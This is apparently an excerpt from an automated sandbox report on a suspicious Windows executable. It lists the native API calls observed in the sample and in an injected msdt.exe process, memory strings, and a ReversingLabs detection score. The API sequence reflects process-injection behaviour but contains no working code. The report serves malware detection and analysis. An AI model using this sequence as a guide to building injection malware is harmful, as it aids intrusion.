          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01929A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01929A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019295D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01929540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01929780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019297A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01929FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01929710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019296E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01929660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019299D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01929950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019298A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01929820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0192B040 NtSuspendThread,
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0192A3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01929B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01929A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01929A10 NtQuerySection,
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019295F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0192AD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01929520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01929560 NtWriteFile,
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0192A710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01929730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_0192A770 NtOpenThread,
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01929770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01929760 NtOpenProcess,
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_019296D0 NtCreateKey,
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01929610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01929650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeCode function: 7_2_01929670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04769540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047695D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04769660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04769650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047696E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047696D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04769710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04769FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04769780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04769860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04769840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04769910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047699A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04769A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04769560 NtWriteFile,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0476AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04769520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047695F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04769670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04769610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0476A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04769770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04769760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04769730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0476A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047697A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0476B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04769820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047698F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047698A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04769950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_047699D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04769A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04769A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04769A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04769A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_04769B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_0476A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_02D18690 NtReadFile,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_02D187C0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_02D18710 NtClose,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_02D185E0 NtCreateFile,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_02D187BC NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_02D1873A NtReadFile,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 13_2_02D185DA NtCreateFile,
          Source: HkE0tD0g4NXKJfy.exe, 00000000.00000002.291189120.0000000000C80000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameReturnValueNameAttribu.exe. vs HkE0tD0g4NXKJfy.exe
          Source: HkE0tD0g4NXKJfy.exe, 00000000.00000002.291856624.0000000003081000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameInnerException.dll" vs HkE0tD0g4NXKJfy.exe
          Source: HkE0tD0g4NXKJfy.exe, 00000000.00000002.291957293.000000000314B000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameInnerException.dll" vs HkE0tD0g4NXKJfy.exe
          Source: HkE0tD0g4NXKJfy.exe, 00000000.00000002.292187512.000000000408D000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameUI.dll@ vs HkE0tD0g4NXKJfy.exe
          Source: HkE0tD0g4NXKJfy.exe, 00000000.00000002.294459774.0000000006490000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameUI.dll@ vs HkE0tD0g4NXKJfy.exe
          Source: HkE0tD0g4NXKJfy.exe, 00000000.00000002.294190854.0000000006030000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameInnerException.dll" vs HkE0tD0g4NXKJfy.exe
          Source: HkE0tD0g4NXKJfy.exe, 00000007.00000002.348444876.00000000035A0000.00000040.00020000.sdmpBinary or memory string: OriginalFilenamemsdt.exej% vs HkE0tD0g4NXKJfy.exe
          Source: HkE0tD0g4NXKJfy.exe, 00000007.00000000.286959339.0000000000ED0000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameReturnValueNameAttribu.exe. vs HkE0tD0g4NXKJfy.exe
          Source: HkE0tD0g4NXKJfy.exe, 00000007.00000002.348145495.0000000001B6F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs HkE0tD0g4NXKJfy.exe
          Source: HkE0tD0g4NXKJfy.exe, 00000007.00000002.347642766.00000000019DF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs HkE0tD0g4NXKJfy.exe
          Source: HkE0tD0g4NXKJfy.exeBinary or memory string: OriginalFilenameReturnValueNameAttribu.exe. vs HkE0tD0g4NXKJfy.exe
          Source: HkE0tD0g4NXKJfy.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: HkE0tD0g4NXKJfy.exeReversingLabs: Detection: 26%
          Source: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exeFile read: C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe:Zone.Identifier